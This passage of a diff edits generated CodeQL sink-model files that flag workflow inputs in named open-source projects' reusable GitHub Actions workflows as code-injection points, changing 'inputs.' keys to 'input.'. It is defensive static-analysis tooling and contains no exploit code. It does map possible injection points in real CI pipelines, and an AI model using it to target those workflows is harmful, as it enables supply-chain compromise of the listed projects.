b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 98571dfc5d9..61bbb9d5372 100644 
--- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 8cbd1927fe0..fdb440a742f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 6d3466f0927..efd05d69abe 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index c7178a298ef..9be191425ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] - - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.chain", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 08feb2033ff..65a14c7cfaa 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] - - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 3483cc13b9e..2c031ea9dc6 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index 45350e121a0..b90aacee9ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9665157b3ad..56823f4e1ac 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 9ef65a67c03..0f2937f9d14 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index eade5ecdae1..a88c74f8537 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 1478244cc9c..b7dfd8fcc9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 8bb0915294c..9de8130a93e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index cba6c4fbe5a..ea4980b8cd7 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] - - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 448d48f661d..8787c7e32c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] - - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 50eb3b1af36..ea55d53c215 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 780fa92d20c..add2fe0d2e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] - - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "input.survey_key", "code-injection", "generated"] + - 
["openttd/openttd/.github/workflows/release-linux.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 275d46772a2..400cd50b59f 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 271c80c575e..42122b5ee22 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "input.package_version", 
"code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 0f4ad0a7ca7..c694d3953f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index c38ae925860..9ecf401cab5 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index fd4697ac1c4..19fee627702 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 90c4c20b585..4eb201001e1 100644 
--- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] - - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 51d99171a54..94c7292b655 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 8e74c9b811d..6088ffcd702 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index cd7de6d5786..05c4dc8ddf3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "input.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml 